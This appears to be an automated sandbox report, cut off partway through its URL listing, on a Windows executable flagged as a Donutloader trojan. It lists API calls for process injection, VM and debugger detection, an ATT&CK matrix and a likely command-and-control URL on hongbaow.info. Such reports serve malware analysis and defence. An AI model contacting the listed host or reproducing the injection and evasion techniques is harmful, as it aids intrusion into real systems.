Source: unknownNetwork traffic detected: HTTP traffic on port 56141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55953
Source: unknownNetwork traffic detected: HTTP traffic on port 56212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56011
Source: unknownNetwork traffic detected: HTTP traffic on port 56215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56228 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56141
Source: unknownNetwork traffic detected: HTTP traffic on port 56168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56206 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56231 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56157 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56034
Source: unknownNetwork traffic detected: HTTP traffic on port 56217 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56157
Source: unknownNetwork traffic detected: HTTP traffic on port 55908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56220 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.214:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.3626968274.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3627003255.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002AC650 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtQueueApcThread,NtQueueApcThread,NtTestAlert,0_2_002AC650
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002C9570 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,GetStdHandle,GetLastError,0_2_002C9570
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_00D48654 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00D48654
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002CE0000_2_002CE000
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002C51010_2_002C5101
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002BD9500_2_002BD950
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002C99B00_2_002C99B0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002D41E00_2_002D41E0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002B0A900_2_002B0A90
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002CCC300_2_002CCC30
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002C04E00_2_002C04E0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002BE4C00_2_002BE4C0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002CA5200_2_002CA520
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002D3D300_2_002D3D30
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002BA5100_2_002BA510
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002C76100_2_002C7610
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002D0E400_2_002D0E40
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002C76B00_2_002C76B0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002BF6800_2_002BF680
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002D1F110_2_002D1F11
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002B97700_2_002B9770
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_00D486540_2_00D48654
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02925C100_2_02925C10
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0293CAB00_2_0293CAB0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02927A100_2_02927A10
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0292A1A00_2_0292A1A0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_029211E00_2_029211E0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_029291200_2_02929120
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0294267A0_2_0294267A
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0292AF900_2_0292AF90
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0292BC800_2_0292BC80
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_029214A00_2_029214A0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02924C200_2_02924C20
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_029435800_2_02943580
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_029285100_2_02928510
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0293454C0_2_0293454C
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02923D600_2_02923D60
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: String function: 029304E0 appears 33 times
Source: jhdfer3s_jh3de.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 00000000.00000002.3626968274.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3627003255.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engineClassification label: mal68.evad.winEXE@2/1@3/3
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\raw[1].txtJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeMutant created: \Sessions\1\BaseNamedObjects\gqfffhj
Source: jhdfer3s_jh3de.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: jhdfer3s_jh3de.exeVirustotal: Detection: 11%
Source: unknownProcess created: C:\Users\user\Desktop\jhdfer3s_jh3de.exe "C:\Users\user\Desktop\jhdfer3s_jh3de.exe"
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: jhdfer3s_jh3de.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: jhdfer3s_jh3de.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: NTCreateprocess.pdb source: jhdfer3s_jh3de.exe
Source: Binary string: NTCreateprocess.pdbP$$$ source: jhdfer3s_jh3de.exe
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002C8D70 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,memmove,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,0_2_002C8D70
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02942D91 push ecx; ret 0_2_02942DA4
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: GetProcessHeap,RtlAllocateHeap,GetAdaptersInfo,HeapFree,RtlAllocateHeap,GetAdaptersInfo,0_2_02922220
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exe TID: 6960Thread sleep time: -36000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeLast function: Thread delayed
Source: jhdfer3s_jh3de.exe, 00000000.00000002.3627003255.0000000000E60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrS
Source: jhdfer3s_jh3de.exe, 00000000.00000002.3627003255.0000000000E1D000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627003255.0000000000E60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002D5F26 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002D5F26
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002C8D70 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,memmove,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,0_2_002C8D70
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002D68F0 GetProcessHeap,HeapAlloc,0_2_002D68F0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002C2DA0 RtlAddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,0_2_002C2DA0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002D608B SetUnhandledExceptionFilter,0_2_002D608B
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002D63C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002D63C8
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002D5F26 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002D5F26
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02932AEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02932AEB
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0292FA27 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0292FA27
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0293030A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0293030A
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02930469 SetUnhandledExceptionFilter,0_2_02930469
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002B8050 cpuid 0_2_002B8050
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_002D5E01 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_002D5E01

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		11
Virtualization/Sandbox Evasion		LSASS Memory1
Query Registry		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Disable or Modify Tools		Security Account Manager121
Security Software Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection		NTDS11
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets2
System Network Configuration Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
Obfuscated Files or Information		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
jhdfer3s_jh3de.exe11%ReversingLabsWin32.Trojan.Casdet
jhdfer3s_jh3de.exe11%VirustotalBrowse
jhdfer3s_jh3de.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://hongbaow.info/hongbaow.info0%Avira URL Cloudsafe
https://hongbaow.info/baow.info/lofzqFkc7.php90%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpJ0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpV0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpF0%Avira URL Cloudsafe
https://hongbaow.info/1T0%Avira URL Cloudsafe
https://hongbaow.info/lofzqFkc7.php0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpP0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpA0%Avira URL Cloudsafe
https://hongbaow.info/0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php&0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php60%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpSan0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpFm0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php90%Avira URL Cloudsafe
https://hongbaow.info/#0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpKa0%Avira URL Cloudsafe
https://hongbaow.info/lofzqFkc7.php90%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpQ0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php70%Avira URL Cloudsafe
https://hongbaow.info/50%Avira URL Cloudsafe
https://hongbaow.info/10%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpocat0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php~Z0%Avira URL Cloudsafe
https://hongbaow.info/90%Avira URL Cloudsafe
https://hongbaow.info/baow.info/0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpg0%Avira URL Cloudsafe
https://hongbaow.info/B0%Avira URL Cloudsafe
https://hongbaow.info/baow.info/lofzqFkc7.php0%Avira URL Cloudsafe
https://hongbaow.info/R0%Avira URL Cloudsafe
https://hongbaow.info/Y0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpUnivX0%Avira URL Cloudsafe
https://hongbaow.info/T0%Avira URL Cloudsafe
https://hongbaow.info/YT0%Avira URL Cloudsafe
https://hongbaow.info/S0%Avira URL Cloudsafe
https://hongbaow.info/WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phperse0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpUniverse0%Avira URL Cloudsafe
https://hongbaow.info/1B0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpw0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
hongbaow.info
104.21.48.1
truefalse
    		unknown
    myexternalip.com
    		34.160.111.145
    		truefalse
      		high
      api.iplocation.net
      		104.26.7.214
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpfalse
        • Avira URL Cloud: safe
        		unknown
        https://myexternalip.com/rawfalse
          		high
          https://api.iplocation.net/?cmd=ip-country&ip=8.46.123.189false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://hongbaow.info/hongbaow.infojhdfer3s_jh3de.exe, 00000000.00000003.1860455007.0000000003550000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hongbaow.info/jhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501630611.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1798924521.0000000003550000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678157513.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559176039.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098751929.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3210893502.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911726400.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443478222.000000000354E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpFjhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 